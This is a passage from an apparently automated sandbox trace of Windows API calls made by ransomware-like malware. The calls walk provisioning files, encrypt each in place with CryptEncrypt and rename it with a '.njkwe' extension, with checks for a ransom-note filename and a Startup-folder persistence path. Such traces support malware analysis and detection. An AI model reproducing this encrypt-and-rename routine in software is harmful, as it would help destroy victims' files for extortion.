pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\526__Connections_Cellular_MTNL (India)_i0$(__MVID)@WAP.provxml") returned 156 [0081.710] StrStrIW (lpFirst="526__Connections_Cellular_MTNL (India)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.710] lstrcmpW (lpString1="526__Connections_Cellular_MTNL (India)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.710] lstrcmpW (lpString1="526__Connections_Cellular_MTNL (India)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.710] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\526__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.710] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\526__Connections_Cellular_MTNL (India)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\526__connections_cellular_mtnl (india)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.711] GetTickCount () returned 0x1154bcb [0081.711] GetTickCount () returned 0x1154bcb [0081.711] GetTickCount () returned 0x1154bcb [0081.711] GetTickCount () returned 0x1154bcb [0081.711] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.711] GetProcessHeap () returned 0xbe0000 [0081.711] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.711] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x27d, lpOverlapped=0x0) returned 1 [0081.712] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd83, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.712] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x27d, lpOverlapped=0x0) returned 1 [0081.712] GetProcessHeap () returned 0xbe0000 [0081.712] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.712] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.713] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.713] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.713] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.713] CloseHandle (hObject=0x43c) returned 1 [0081.741] GetProcessHeap () returned 0xbe0000 [0081.741] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.742] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\526__Connections_Cellular_MTNL (India)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0081.742] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\526__Connections_Cellular_MTNL (India)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\526__connections_cellular_mtnl (india)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\526__Connections_Cellular_MTNL (India)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\526__connections_cellular_mtnl (india)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.742] GetProcessHeap () returned 0xbe0000 [0081.742] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.742] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912d2bb2, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912d2bb2, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912d2bb2, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2dc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="527__Connections_Cellular_Reliance Communication (India)_i0$(__MVID)@WAP.provxml", cAlternateFileName="527__C~1.PRO")) returned 1 [0081.742] lstrcmpiW (lpString1="527__Connections_Cellular_Reliance Communication (India)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.743] lstrcmpiW (lpString1="527__Connections_Cellular_Reliance Communication (India)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.743] lstrcmpiW (lpString1="527__Connections_Cellular_Reliance Communication (India)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.743] lstrcmpiW (lpString1="527__Connections_Cellular_Reliance Communication (India)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.743] lstrcmpiW (lpString1="527__Connections_Cellular_Reliance Communication (India)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.743] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\527__Connections_Cellular_Reliance Communication (India)_i0$(__MVID)@WAP.provxml") returned 174 [0081.743] StrStrIW (lpFirst="527__Connections_Cellular_Reliance Communication (India)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.743] lstrcmpW (lpString1="527__Connections_Cellular_Reliance Communication (India)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.743] lstrcmpW (lpString1="527__Connections_Cellular_Reliance Communication (India)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.743] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\527__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.743] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\527__Connections_Cellular_Reliance Communication (India)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\527__connections_cellular_reliance communication (india)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.743] GetTickCount () returned 0x1154bea [0081.743] GetTickCount () returned 0x1154bea [0081.743] GetTickCount () returned 0x1154bea [0081.743] GetTickCount () returned 0x1154bea [0081.743] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.743] GetProcessHeap () returned 0xbe0000 [0081.743] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.743] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2dc, lpOverlapped=0x0) returned 1 [0081.804] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.804] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2dc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2dc, lpOverlapped=0x0) returned 1 [0081.805] GetProcessHeap () returned 0xbe0000 [0081.805] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.805] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.805] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.805] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.805] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.805] CloseHandle (hObject=0x43c) returned 1 [0081.805] GetProcessHeap () returned 0xbe0000 [0081.805] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.805] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\527__Connections_Cellular_Reliance Communication (India)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 194 [0081.805] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\527__Connections_Cellular_Reliance Communication (India)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\527__connections_cellular_reliance communication (india)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\527__Connections_Cellular_Reliance Communication (India)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\527__connections_cellular_reliance communication (india)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.806] GetProcessHeap () returned 0xbe0000 [0081.806] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.806] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912d2bb2, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912d2bb2, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912d2bb2, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="528__Connections_Cellular_Vodafone IN (India)_i0$(__MVID)@WAP.provxml", cAlternateFileName="528__C~1.PRO")) returned 1 [0081.809] lstrcmpiW (lpString1="528__Connections_Cellular_Vodafone IN (India)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.809] lstrcmpiW (lpString1="528__Connections_Cellular_Vodafone IN (India)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.809] lstrcmpiW (lpString1="528__Connections_Cellular_Vodafone IN (India)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.809] lstrcmpiW (lpString1="528__Connections_Cellular_Vodafone IN (India)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.809] lstrcmpiW (lpString1="528__Connections_Cellular_Vodafone IN (India)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.809] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\528__Connections_Cellular_Vodafone IN (India)_i0$(__MVID)@WAP.provxml") returned 163 [0081.810] StrStrIW (lpFirst="528__Connections_Cellular_Vodafone IN (India)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.810] lstrcmpW (lpString1="528__Connections_Cellular_Vodafone IN (India)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.810] lstrcmpW (lpString1="528__Connections_Cellular_Vodafone IN (India)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.810] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\528__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.810] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\528__Connections_Cellular_Vodafone IN (India)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\528__connections_cellular_vodafone in (india)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.810] GetTickCount () returned 0x1154c28 [0081.810] GetTickCount () returned 0x1154c28 [0081.810] GetTickCount () returned 0x1154c28 [0081.810] GetTickCount () returned 0x1154c28 [0081.810] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.810] GetProcessHeap () returned 0xbe0000 [0081.810] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.810] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2c2, lpOverlapped=0x0) returned 1 [0081.812] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.812] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2c2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2c2, lpOverlapped=0x0) returned 1 [0081.812] GetProcessHeap () returned 0xbe0000 [0081.812] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.812] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.812] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.812] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.812] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.812] CloseHandle (hObject=0x43c) returned 1 [0081.812] GetProcessHeap () returned 0xbe0000 [0081.812] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.812] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\528__Connections_Cellular_Vodafone IN (India)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0081.813] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\528__Connections_Cellular_Vodafone IN (India)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\528__connections_cellular_vodafone in (india)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\528__Connections_Cellular_Vodafone IN (India)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\528__connections_cellular_vodafone in (india)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.814] GetProcessHeap () returned 0xbe0000 [0081.814] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.814] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912d2bb2, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912d2bb2, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912d2bb2, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="529__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="529__C~1.PRO")) returned 1 [0081.814] lstrcmpiW (lpString1="529__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0081.814] lstrcmpiW (lpString1="529__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0081.814] lstrcmpiW (lpString1="529__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0081.814] lstrcmpiW (lpString1="529__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0081.814] lstrcmpiW (lpString1="529__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0081.814] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\529__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0081.814] StrStrIW (lpFirst="529__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0081.814] lstrcmpW (lpString1="529__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.814] lstrcmpW (lpString1="529__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0081.814] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\529__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.814] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\529__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\529__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.815] GetTickCount () returned 0x1154c38 [0081.815] GetTickCount () returned 0x1154c38 [0081.815] GetTickCount () returned 0x1154c38 [0081.815] GetTickCount () returned 0x1154c38 [0081.815] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.815] GetProcessHeap () returned 0xbe0000 [0081.815] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.815] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0081.816] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.816] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0081.816] GetProcessHeap () returned 0xbe0000 [0081.816] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.816] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.816] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.817] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.818] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.818] CloseHandle (hObject=0x43c) returned 1 [0081.818] GetProcessHeap () returned 0xbe0000 [0081.818] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.818] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\529__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0081.818] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\529__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\529__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\529__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\529__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.819] GetProcessHeap () returned 0xbe0000 [0081.819] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.819] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x902943e8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x902943e8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x902943e8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x291, dwReserved0=0x1, dwReserved1=0x8000000, 